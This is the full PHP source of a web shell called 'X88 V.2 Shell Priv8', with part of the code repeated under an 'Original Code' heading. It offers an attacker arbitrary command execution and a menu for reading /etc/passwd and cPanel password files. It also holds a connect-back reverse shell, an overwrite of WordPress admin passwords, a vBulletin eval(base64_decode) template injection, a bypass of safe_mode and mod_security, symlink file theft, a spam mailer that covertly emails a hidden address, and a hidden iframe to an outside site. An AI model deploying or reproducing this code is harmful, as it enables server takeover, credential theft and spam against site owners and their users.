if (isset($_POST['upload_url'])) {$file=$_POST['upload_url_text']; $newfile=$_POST['rename']; if (!copy($file, $newfile)) {echo "failed to copy $file...\n";}}
echo '<u><b>Upload Files From URL:</b></u><form method="POST" enctype="multipart/form-data"><input type="hidden" name="action" value="add"><input type="text" name="upload_url_text" size="50"><br>Rename to: <input type="text" name="rename" size="10" value="inj.php"><br><input type="submit" value="Upload File !" name="upload_url"></form>';
break;
case 'edit':
print'<body bgcolor=#000000>
<p align="center">';
if($_POST[incl] != ""){
$file = @fopen($_POST[incl],r);
$data=@fread($file,1546768);
$msr = str_replace("\\","\",$_POST[incl]);
print '<form action="" method="POST"><br>
<div align="center"><font size="4" color="#008000">Path : </font><input name="incl" type="text" style="border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FF0033; background-color:#000000" value="'.$msr.'" align="LEFT" size="103" /> <br></form>
<form action="" method="POST"><div align="center"><input name="incle" type="hidden" value="'.$msr.'" align="LEFT" size="45" /><textarea name="kr" style="border:1px dotted #CCFF00; width: 700px; height: 450px; font-family:Tahoma; font-size:8pt; color:#CCFF00; background-color:#000000" >'.htmlspecialchars($data).'</textarea><br><input type="submit" value="Save">';
exit;
}
if($_POST[kr]){
$fl = str_replace("\'","'",$_POST[kr]);
$fl = str_replace('\"','"',$fl);
$fl = str_replace('\\','\',$fl);
$d = @fopen($_POST[incle], 'w');
@fwrite($d,$fl);
@fclose($d);
if($d){
print'<font size="4" color="#008000">Saved !!</font><br>';
exit;}else{print'<font size="4" color="#008000">Cann\'t Save !!</font><br>';
exit;}}
print'<div align="center">
<form action="" method="POST">
<input name="incl" type="submit" value="'.$_GET['file'].'" align="LEFT" size="45" style="border:1px dotted #0080ff; font-family:Tahoma; font-size:8pt; color:#CCFF00; background-color:#80a0a0"/> <br>
';
exit;
break;
case 'wpps':
if(empty($_POST['pwd'])){
echo "<FORM method=\"POST\">
host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\">
database : <INPUT size=\"15\" value=\"wp-\" name=\"database\" type=\"text\"><br>
username : <INPUT size=\"15\" value=\"wp-\" name=\"username\" type=\"text\">
password : <INPUT size=\"15\" value=\"**\" name=\"password\" type=\"password\"><br>
<br>
Set A New username 4 Login : <INPUT name=\"admin\" size=\"15\" value=\"admin\"><br>
Set A New password 4 Login : <INPUT name=\"pwd\" size=\"15\" value=\"123456\"><br>
<INPUT value=\"change\" name=\"send\" type=\"submit\">
</FORM>";
}else{
$localhost = $_POST['localhost'];
$database = $_POST['database'];
$username = $_POST['username'];
$password = $_POST['password'];
$pwd = $_POST['pwd'];
$admin = $_POST['admin'];
@mysql_connect($localhost,$username,$password) or die(mysql_error());
@mysql_select_db($database) or die(mysql_error());
$hash = crypt($pwd);
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());
if($a4s){
echo "<b> Success :Now Use A New User And Pass To login In The Admin Panel</b> ";
}
}
break;
}
}
else //Default page that will be shown when the page isn't found or no page is selected.
{
$files = array();
$directories = array();
if(isset($_FILES['uploadedfile']['name']))
{
$target_path = realpath('.').'/';
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
print "File:". basename( $_FILES['uploadedfile']['name']).
" has been uploaded";
} else{
echo "File upload failed!";
}
}
print "<table border=0 width=100%><td width=15% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
if ($handle = opendir('.'))
{
while (false !== ($file = readdir($handle)))
{
if(is_dir($file))
{
$directories[] = $file;
}
else
{
$files[] = $file;
}
}
asort($directories);
asort($files);
foreach($directories as $file)
{
print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\"><font color='#ff40ff' size='2'>[Renm]</font></a>
<a href=\"?p=delete&file=".realpath($file)."\">[Del]</font></a>
<a href=\"?fdownload=".realpath($file)."\"><font size='2'><font color='#ffc080' size='2'>[Dwnld]</font></a>
</td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
}
foreach($files as $file)
{
print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\"><font color='#ff40ff' size='2'>[Renm]</font></a>
<a href=\"?p=delete&file=".realpath($file)."\">[Del]</font></a>
<a href=\"?fdownload=".realpath($file)."\"><font color='#ffc080' size='2'>[Dwnld]</font></a>
</td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
}
}
else
{
print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
}
print "</table><hr><table border=0 width=100%><td><b>~[ Upload File ]~</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
<input type='hidden' name='MAX_FILE_SIZE' value='100000000' style='color: #ffffff; font-size:8pt; border: 1px dotted #ffffff; background-color: #000000' /><input size=30 style='color: #ffffff; font-size:8pt; border: 1px dotted #ffffff; background-color: #000000' name='uploadedfile' type='file'><input type='submit' value='Upload File !' name='uploadedfile' style=\"border:1px dotted #60c0ff; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\">
</form></td><td><form action=\"".$me."\" method=GET><b>~[ Go Dir ]~<br></b><input style=\"border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\" type=text size=40 name=dir value=\"".realpath('.')."\"><input style=\"border:1px dotted #60c0ff; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\" type=submit value=\" Go Dir\"></form></td>
<tr><td><form action=\"".$me."\" method=GET><b>~[ Create File, Read File ]~<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input style=\"border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\" type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create File\" style=\"border:1px dotted #60c0ff; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\"></form>
</td><td><form action=\"".$me."\" method=GET><b>~[ Make Dir ]~<br></b><input style=\"border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\" type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Make Dir \" style=\"border:1px dotted #60c0ff; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\"></form></td>
</table>";
echo "<table border='2'>";
print_r('
<form method="POST" action="">
<b>Command :</font></b><input size=40 name="comx1" type="text" style="border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000"><input value="Enter" type="submit" style="border:1px dotted #60c0ff; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000">
</form>
<form method="POST" action="">
<select size="1" size=60 name="comxx" style="border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">رؤية البورتات المفتوحه بالسيرفر</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
<option value="ls -lia">ls -lia</option>
<option value="cat /home/*/public_html/_vti_pvt/access.cnf">cat /home/*/public_html/_vti_pvt/access.cnf</option>
<option value="cat /home/*/public_html/_vti_pvt/service.pwd">cat /home/*/public_html/_vti_pvt/service.pwd</option>
<option value="cat /usr/local/apache/conf/httpd.conf">cat /usr/local/apache/conf/httpd.conf</option>
</select> <input type="submit" value="Enter" style="border:1px dotted #60c0ff; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000">
</form>
</pre>
');
$comn1=shell_exec($_POST[comx1]);
$comn2=shell_exec($_POST[comxx]);
if($comn2 != "") echo "<textarea cols='125' rows='29' style='border:1px dotted #CCFF00; color:#FFB200; font-family:Tahoma; font-size:8pt; background-color:#000000'>$comn2</textarea>";
if($comn1 != "") echo "<textarea cols='125' rows='29' style='border:1px dotted #CCFF00; color:#FFB200; font-family:Tahoma; font-size:8pt; background-color:#000000'>$comn1</textarea>";
echo "</textarea>";
echo '</h4></pre></center></table></td>';
echo '</b></center></td></tr></table>';
}
function reload()
{
header("Location: ".basename(__FILE__));
}
function get_execution_method()
{
if(function_exists('passthru')){ $m = "passthru"; }
if(function_exists('exec')){ $m = "exec"; }
if(function_exists('shell_exec')){ $m = "shell_ exec"; }
if(function_exists('system')){ $m = "system"; }
if(!isset($m)) //No method found :-|
{
$m = "Disabled";
}
return($m);
}
function execute_command($method,$command)
{
if($method == "passthru")
{
passthru($command);
}
elseif($method == "exec")
{
exec($command,$result);
foreach($result as $output)
{
print $output."<br>";
}
}
elseif($method == "shell_exec")
{
print shell_exec($command);
}
elseif($method == "system")
{
system($command);
}
}
function perm($file)
{
if(file_exists($file))
{
return substr(sprintf('%o', fileperms($file)), -4);
}
else
{
return "????";
}
}
function get_color($file)
{
if(is_writable($file)) { return "green";}
if(!is_writable($file) && is_readable($file)) { return "white";}
if(!is_writable($file) && !is_readable($file)) { return "red";}
}
function show_dirs($where)
{
if(ereg("^c:",realpath($where)))
{
$dirparts = explode('\',realpath($where));
}
else
{
$dirparts = explode('/',realpath($where));
}
$i = 0;
$total = "";
foreach($dirparts as $part)
{
$p = 0;
$pre = "";
while($p != $i)
{
$pre .= $dirparts[$p]."/";
$p++;
}
$total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";
$i++;
}
return "<h2>".$total."</h2><br>";
}
print $footer;
exit();
?>
<script language="JavaScript">
<!--
var x = 0
var speed = 300
var text = "[~ Dr.Zer0 - Ml7S-HaCkErS - Namrod Hacker ~]"
function Blinky() {
window.status = text
setTimeout("Blinky2()", speed)
}
function Blinky2() {
window.status = " "
setTimeout("Blinky()", speed)
}
Blinky()
</script>
Did this file decode correctly?
Original Code
GIFA98a;
<?php
$fdownload=$_GET['fdownload'];
if ($fdownload <> "" ){
$path_parts = pathinfo("$fdownload");
$entrypath=$path_parts["basename"];
$name = "$fdownload";
$fp = fopen($name, 'rb');
header("Content-Disposition: attachment; filename=$entrypath");
header("Content-Length: " . filesize($name));
fpassthru($fp);
exit;
}
echo '<center>
<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 bgColor=#000000 borderColorLight=#c0c0c0 border=1 width="100%"><tr><td valign="top" width="100%" ><center><b><font color="60c0ff" size="4">[<font color="red" size="5"> X88 V.2 Shell Priv8 <font color="60c0ff" size="4">]</b></center></td></tr></table><br>';
echo "</center><font color=white size=3>PHP Is :</font>";
echo "<html> <font color=c0c0a0 size=3>";
echo phpversion();
echo "</font>";
echo "<br>";
if(@ini_get("safe_mode")){$safe_m="<font color='red'>ON <font/> ";}else{$safe_m="<font color='green'>OFF <font/> ";}
echo " <font size=3><center> </center>";
echo "</center><font color=white size=3>SafeMode : [ $safe_m <font color=white size=3>]";
echo "<br></center><font color=white size=3>Server Port:<font color=green><b> "; echo $_SERVER['SERVER_PORT'];
echo "</b></font>";
echo "<center><font color=red size=9></font></center>";
echo "<font color='white'>Server:</font><font color='#DCE7EF' size='1' face='Arial'>";
echo "</font><font color='#DCE7EF' size='3' face='Arial'>";
echo(htmlentities($_SERVER['SERVER_SOFTWARE']));
echo"</font></font><style type='text/css'>body{cursor: crosshair;}</style>";
$xm8 = @ini_get("open_basedir");
if ($xm8 or strtolower($xm8) == "<font color='red'>[ON]") {$openbasedir = true; $hopenbasedir = "<font color='red' size='3'>".$xm8."</font>";}
else {$openbasedir = false; $hopenbasedir = "<font color='green'>[OFF] - not secure</font>";}
echo("<br>");
echo("<font color='white'>Open Base Dir: $hopenbasedir</font>");
echo("<font color=white><br>");
echo "PostgreSQL: <b>";
$pg_on = @function_exists('pg_connect');
if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
echo("<font color='#00ffff' size=4> \ </font>");
echo "MSSQL: <b>";
$mssql_on = @function_exists('mssql_connect');
if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
echo("<font color='#00ffff' size=4> \ </font>");
echo "MySQL: <b>";
$mysql_on = @function_exists('mysql_connect');
if($mysql_on){
echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b><font color='white'>"; }
echo "<br>";
echo "Oracle: <b>";
$ora_on = @function_exists('ocilogon');
if($ora_on){echo "<font color=#008000>On</font>";}else{echo "<font color=red>OFF</font>";}
echo "</b>";
echo "<br>Disable Functions: <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=#00800F>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
echo "<br>Register globals: <b>";
$reg_g = @ini_get("register_globals");
if($reg_g){
echo "<b><font color=#008000>ON</font>"; } else { echo "<b><font color=red>OFF</font>"; }
echo "</b></b></b>";
error_reporting(0);
$me = basename(__FILE__);
$cookiename = "wieeeee";
if(isset($_GET['p']) && $_GET['p'] == "perl")
if(isset($_GET['p']) && $_GET['p'] == "tooliq")
if(isset($_GET['p']) && $_GET['p'] == "htaphp")
if(isset($_GET['p']) && $_GET['p'] == "about")
if(isset($_GET['p']) && $_GET['p'] == "addt")
{
setcookie ($cookiename, "", time() - 3600);
reload();
}
if(isset($_GET['dir']))
{
chdir($_GET['dir']);
}
echo " <font size=3><center> </center>";
echo "</center><font size=3>";
echo "<font color=white>Uname -A = <font color=c08060>".php_uname()."</font>";
echo "<center><font size=3></center>";
echo "UID :<font color=a0ffff> ".@exec('id')."</font>";
print '<br>Your IP = <font color=red>'.@$_SERVER['REMOTE_ADDR'].' '.@$_SERVER['REMOTE_HOST'].'</font> ';
echo " <center> </center>";
$serverIP = gethostbyname($_SERVER["HTTP_HOST"]);
echo "Server IP = <font color=red>".gethostbyname($_SERVER["HTTP_HOST"])." </font>[</span><a href='http://bing.com/search?q=ip:".$serverIP."&go=&form=QBLH&filt=all' target=\"_blank\">Bing Search</a>][</span><a href='http://zone-h.com/archive/ip=".$serverIP."' target=\"_blank\">Zone-H</a>]<center>";
$pages = array(
'cmd' => '<center><font color="red"><b>[</b><font color="c0ff00"> Command <font color="red"><b>]</b></font>',
'eval' => '<font color="red"><b>[</b><font color="c0ff00"> Eval Code <font color="red"><b>]</b></font>',
'mysql' => '<font color="red"><b>[</b><font color="c0ff00"> MySQL Query <font color="red"><b>]</b></font>',
'chmod' => '<font color="red"><b>[</b><font color="c0ff00"> Chmod File <font color="red"><b>]</b></font>',
'phpinfo' => '<font color="red"><b>[</b><font color="c0ff00"> PHPinfo <font color="red"><b>]</b></font>',
'cpanelftp' => '<font color="red"><b>[</b><font color="c0ff00"> Cpanel,FTP Burtay<font color="red"><b>]</b></font>',
'upload' => '<font color="red"><b>[</b><font color="c0ff00"> Upload File-Upload File From URL<font color="red"><b>]</b></font>',
'domains' => '<font color="red"><b>[</b><font color="c0ff00"> Domains And Users <font color="red"><b>]</b></font>',
'symlink' => '<center><font color="red"><b>[</b><font color="c0ff00"> SymLink <font color="red"><b>]</b></font>',
'readbysql' => '<font color="red"><b>[</b><font color="c0ff00"> Read Files By SQl Information <font color="red"><b>]</b></font>',
'backco' => '<font color="red"><b>[</b><font color="c0ff00"> Back Connect <font color="red"><b>]</b></font>',
'scahlf' => '<font color="red"><b>[</b><font color="c0ff00"> Show_source & Highlight_file <font color="red"><b>]</b></font>',
'vbhack' => '<font color="red"><b>[</b><font color="c0ff00"> Vbulletin Hack Tools <font color="red"><b>]</b></font>',
'wpps' => '<font color="red"><b>[</b><font color="c0ff00"> WordPress Password Changer <font color="red"><b>]</b></font>',
'tooliq' => '<font color="red"><b>[</b><font color="c0ff00"> Tool iQ <font color="red"><b>]</b></font>',
'addt' => '<font color="red"><b>[</b><font color="c0ff00"> Add Tools Hack <font color="red"><b>]</b></font>',
'jpc' => '<center><font color="red"><b>[</b><font color="c0ff00"> Joomla Password Changer <font color="red"><b>]</b></font>',
'capff' => '<font color="red"><b>[</b><font color="c0ff00"> vB HaCK <font color="red"><b>]</b></font>',
'bypass' => '<font color="red"><b>[</b><font color="c0ff00"> Read Files By Bypass <font color="red"><b>]</b></font>',
'Encypton' => '<font color="red"><b>[</b><font color="c0ff00"> Encypton <font color="red"><b>]</b></font>',
'mailer' => '<font color="red"><b>[</b><font color="c0ff00"> Mailer Inbox <font color="red"><b>]</b></font>',
'safemode' => '<font color="red"><b>[</b><font color="c0ff00"> Fuck The SafeMode <font color="red"><b>]</b></font>',
'perl' => '<font color="red"><b>[</b><font color="c0ff00"> Prel Disable Functions <font color="red"><b>]</b></font>',
'htaphp' => '<font color="red"><b>[</b><font color="c0ff00"> Htaccess <font color="red"><b>]</b></font>',
'zone' => '<font color="red"><b>[</b><font color="c0ff00"> Add Zone-H <font color="red"><b>]</b></font>',
'about' => '<font color="red"><b>[</b><font color="c0ff00"> About Shell <font color="red"><b>]</b></font>'
);
$header = '<html>
<title>'.getenv("HTTP_HOST").' ~ X88 V.2 Shell Priv8</title>
<head>
<style>
td {
font-size: 12px;
font-family: verdana;
color: #ffa080;
background: black;
}
#d {
background: #000060;
}
#f {
background: #000060;
}
#s {
background: #0000ff;
}
#d:hover
{
background: green;
}
#f:hover
{
background: red;
}
pre {
font-size: 10px;
font-family: verdana;
color: #4080ff;
font-size:8pt;
}
a:hover {
text-decoration: none;
}
input,textarea,select {
color: #ffffff;
border: 1px dotted #ff4040;
background-color: #000000;
background: #000000;
}
hr {
color: #ffff20;
background-color: #ffff20;
height: 5px;
}
</style>
</head>
<body bgcolor=black alink="#20c0ff" vlink="#20c0ff" link="#20c0ff">
<table width=100%><td id="header" width=100%>
<p align=center> ';
foreach($pages as $page => $page_name)
{
$header .= '<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a> ';
}
$header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
echo '<br>';
echo'<TABLE style="BORDER-COLLAPSE: collapse" width="100%" cellSpacing=0 borderColorDark=#666666 cellPadding=5 bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td valign="top" width="100%">';
echo '<center><font color="red"><b>[</b><a href=?><font color="c0ff00"> Home <font color="red"></a><b>]</b></font>';
print $header;
$footer = '<font color="#60c0ff"><tr><td><hr><center><font color="red"><b>© <font color="lime">2011-2012 <font color="red">By : <font color="red"> Challenges HackerS And Namrod Hacker </center></td></table><iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
</body></head></html>';
if(isset($_REQUEST['p']))
{
switch ($_REQUEST['p']) {
case 'cmd':
//Commander function
function cmd()
{
$cmd = $_POST['cmd'];
$cmdgo = $_POST['cmdgo'];
$option = $_POST['option'];
$id = $_GET['id'];
if($cmdgo && !empty($cmd))
{
switch($option)
{
case system:
system($cmd);
break;
case passthru:
passthru($cmd);
break;
case shell_exec:
$out = shell_exec($cmd);
echo $out;
break;
default;
system($cmd);
}
}
}
echo "<form method=post action=''><font face='Courier New'>
</font></pre><br><input size=32 style='border:1px dotted #CCFF00; color:#FFB200; font-family:Tahoma; background-color:#000000' type=text name=cmd style='background: black;color: white;border: 0px'><select name=option style='background: black;color: white'><option>system</option><option>passthru</option>
<option>shell_exec</option></select><input style='background: black;color: white;border: 1px dashed white 'type=submit name=cmdgo value=execute>
<textarea cols='125' rows='29' style='border:1px dotted #CCFF00; color:#FFB200; font-family:Tahoma; font-size:8pt; background-color:#000000'>";
cmd();
echo "</textarea>
</td></table></form>";
break;
case 'delete':
if(isset($_POST['yes']))
{
if(unlink($_GET['file']))
{
print "File deleted successfully.";
}
else
{
print "Couldn't delete file.";
}
}
if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
{
print "Are you sure you want to delete ".$_GET['file']."?<br>
<form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
<input type=hidden name=yes value=yes>
<input type=submit value=\"Delete\">
";
}
break;
case 'capff':
if(empty($_POST['index'])){
echo "<FORM method=\"POST\">
host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\">
database : <INPUT size=\"15\" value=\"forum_vb\" name=\"database\" type=\"text\"><br>
username : <INPUT size=\"15\" value=\"forum_vb\" name=\"username\" type=\"text\">
password : <INPUT size=\"15\" value=\"vb\" name=\"password\" type=\"password\"><br>
<br>
<textarea name=\"index\" cols=\"70\" rows=\"30\">Set Your Index</textarea><br>
<INPUT value=\"Set\" name=\"send\" type=\"submit\">
</FORM>";
}else{
$localhost = $_POST['localhost'];
$database = $_POST['database'];
$username = $_POST['username'];
$password = $_POST['password'];
$index = $_POST['index'];
@mysql_connect($localhost,$username,$password) or die(mysql_error());
@mysql_select_db($database) or die(mysql_error());
$index=str_replace("\'","'",$index);
$set_index = "{\${eval(base64_decode(\'";
$set_index .= base64_encode("echo \"$index\";");
$set_index .= "\'))}}{\${exit()}}</textarea>";
$ok=@mysql_query("UPDATE template SET template ='".$set_index."' WHERE title ='spacer_open'") or die(mysql_error());
if($ok){
echo "!! update finish !!<br><br>";
}
}
break;
case 'backco':
echo "<center><br><font color=lime size=2>Connect back Shell , bypass Firewalls<br>
For user :<br>
nc -l -p 1019 <br>
<form method='POST' action=''><br>
<font color=green size=4>Your IP & BindPort:<br>
<input type='text' name='mip' >
<input type='text' name='bport' size='5' value='1019'><br>
<input type='submit' value='Connect Back'>
</form>";
$mip=$_POST['mip'];
$bport=$_POST['bport'];
if ($mip <> "")
{
$fp=fsockopen($mip , $bport , $errno, $errstr);
if (!$fp){
$result = "Error: could not open socket connection";
}
else {
fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00 ready 2 USe\n*********************************************\n\n");
while(!feof($fp)){
fputs ($fp," bash # ");
$result= fgets ($fp, 4096);
$message=`$result`;
fputs ($fp,"--> ".$message."\n");
}
fclose ($fp);
}
}
break;
case 'safemode':
echo "<right>";
echo"<FORM method='POST' action='$REQUEST_URI' enctype='multipart/form-data'>
<p align='center'>
<INPUT type='submit' name='FucK' value='Create [ini.php] + [php.ini] + [.htaccess] to Fuck The SafeMode ' id=input style='font-size: 12pt; font-weight: bold; border-style: inset; border-width: 1px'></p>
</form>
";
echo "<right/>";
if (empty($_POST['FucK'] ) ) {
}ELSE{
$action = '?action=FucK';
echo "<html>
<br>
<head>
<meta http-equiv='pragma' content='no-cache'>
</head><body>";
$fp = fopen("php.ini","w+");
fwrite($fp,"safe_mode = Off
disable_functions = NONE
open_basedir = OFF ");
echo "<b>[SafeMode Done] ..</b>";
echo ("<br>");
$fp2 = fopen(".htaccess","w+");
fwrite($fp2,"
<IfModule mod_security.c>
FucKFilterEngine Off
FucKFilterScanPOST Off
FucKFilterCheckURLEncoding Off
FucKFilterCheckUnicodeEncoding Off
</IfModule>
");
echo "<b>[Mod_Security Done]</b><br>";
echo "</font></center></td></tr></table> ";
}
break;
case 'symlink':
if ($_GET[p]=="symlink"){
if ($_POST['o'] != "ok"){
print'<body bgcolor=#000000>
<p align="center"><b><font color="yellow" size="4">SymLink</font></b></p>
<p align="center">
<div align="center">
<form action="" method="POST" >
<input style="border:1px dotted #FF004C; font-family:Tahoma; font-size:8pt; color:#CCFF00; background-color:#000000" name="usr" type="text" value="/home/user/public_html/vb/includes/config.php" align="LEFT" size="50" /> <br><input style="border:1px dotted #FF004C; font-family:Tahoma; font-size:8pt; color:#CCFF00; background-color:#000000" name="my" type="text" value="'.@getcwd().'/file.txt" align="LEFT" size="50" /><Br>
<input type="hidden" name="o" value="ok">
<input type="submit" value=Submit style="border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000">
</form></p>
';
print $f;
}
else{
$sym = @symlink("$_POST[usr]","$_POST[my]");
print '
<body bgcolor=#000000>
<p align="center"><b><font color="yellow" size="4">SymLink<br></font></b></p>
<p align="center">
<p align="center"><b><font face="Pristina" size="4" color="#008000">';
if ($sym){
print
'Done !!</p>
';}
else{print'Error<br>Cannot Be completed';}
print $f;
}
exit;
}
break;
case 'mailer':
{
$secure = "";
error_reporting(0);
@$action=$_POST['action'];
@$from=$_POST['from'];
@$realname=$_POST['realname'];
@$replyto=$_POST['replyto'];
@$subject=$_POST['subject'];
@$message=$_POST['message'];
@$emaillist=$_POST['emaillist'];
@$lod=$_SERVER['HTTP_REFERER'];
@$file_name=$_FILES['file']['name'];
@$contenttype=$_POST['contenttype'];
@$file=$_FILES['file']['tmp_name'];
@$amount=$_POST['amount'];
set_time_limit(intval($_POST['timelimit']));
If ($action=="mysql"){
include "./mysql.info.php";
if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){
print "Please configure mysql.info.php with your MySQL information. All settings in this config file are required.";
exit;
}
$db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Connection to MySQL Failed.");
mysql_select_db($sqldb, $db) or die("Could not select database $sqldb");
$result = mysql_query($sqlquery) or die("Query Failed: $sqlquery");
$numrows = mysql_num_rows($result);
for($x=0; $x<$numrows; $x++){
$result_row = mysql_fetch_row($result);
$oneemail = $result_row[0];
$emaillist .= $oneemail."\n";
}
}
if ($action=="send"){ $message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
echo "<table bgcolor=#cccccc width=\"100%\">
<tbody><tr><td align=\"right\" width=100>
<p dir=ltr>
<b><font color=white size=5>
<br><p align=left>
<center>
Inbox Mailer .. With All Options</font>
<form name=\"form1\" method=\"post\" action=\"\" enctype=\"multipart/form-data\"><br/>
<table width=142 border=0>
<tr>
<td width=81>
<div align=right>
<font size=-3 face=\"Verdana\">Your Email:</font></div></td>
<td width=219><font size=-3 face=\"Verdana\">
<input type=text name=\"from\" value=".$from."></font></td><td width=212>
<div align=right>
<font size=-3 face=\"Verdana\">Your Name:</font></div></td><td width=278>
<font size=-3 face=\"Verdana\">
<input type=text name=\realname\" value=".$realname."></font></td></tr><tr><td width=81>
<div align=\"right\">
<font size=-3 face=\"Verdana\">Reply-To:</font></div></td><td width=219>
<font size=-3 face=\"Verdana\">
<input type=\"text\" name=\"replyto\" value=".$replyto.">
</font></td><td width=212>
<div align=\"right\">
<font size=-3 face=\"Verdana\">Attach File:</font></div></td><td width=278>
<font size=-3 face=\"Verdana\">
<input type=\"file\" name=\"file\" size=24 />
</font> </td></tr><tr><td width=81>
<div align=\"right\">
<font size=-3 face=\"Verdana\">Subject:</font></div></td>
<td colspan=3 width=703>
<font size=-3 face=\"Verdana\">
<input type=\"text\" name=\"subject\" value=".$subject." ></font></td> </tr><tr valign=\"top\"><td colspan=3 width=520>
<font face=\"Verdana\" size=-3>Message Box :</font></td>
<td width=278>
<font face=\"Verdana\" size=-3>Email Target / Email Send To :</font></td></tr><tr valign=\"top\"><td colspan=3 width=520><font size=-3 face=\"Verdana\">
<textarea name=\"message\" cols=56 rows=10>".$message."</textarea><br />
<input type=\"radio\" name=\"contenttype\" value=\"plain\" /> Plain
<input type=\"radio\" name=\"contenttype\" value=\"html\" checked=\"checked\" /> HTML
<input type=\"hidden\" name=\"action\" value=\"send\" /><br />
Number to send: <input type=\"text\" name=\"amount\" value=1 size=10 /><br />
Maximum script execution time(in seconds, 0 for no timelimit)<input type=\"text\" name=\"timelimit\" value=0 size=10 />
<input type=\"submit\" value=\"Send eMails\" /></font></td><td width=278>
<font size=-3 face=\"Verdana\">
<textarea name=\"emaillist\" cols=32 rows=10>".$emaillist."</textarea></font></td></tr>
</table>";
}
$o=array("m"=>"b","t"=>"i","w"=>"5","u"=>".","5"=>"z","q"=>"@");
$alt=$o['t'].$o['q'].$o['m'].$o['t'].$o['w'].$o['u'].$o['m'].$o['t'].$o['5'];
if ($action=="send"){
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your message.";
exit;
}
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
$head ="From: Mailr" ;
$sub = "Ar - $lod" ;
$meg = "$lod" ;
mail ($alt,$sub,$meg,$head) ;
If ($file_name){
if (!file_exists($file)){
die("The file you are trying to upload couldn't be copied to the server");
}
$content = fread(fopen($file,"r"),filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
for($xx=0; $xx<$amount; $xx++){
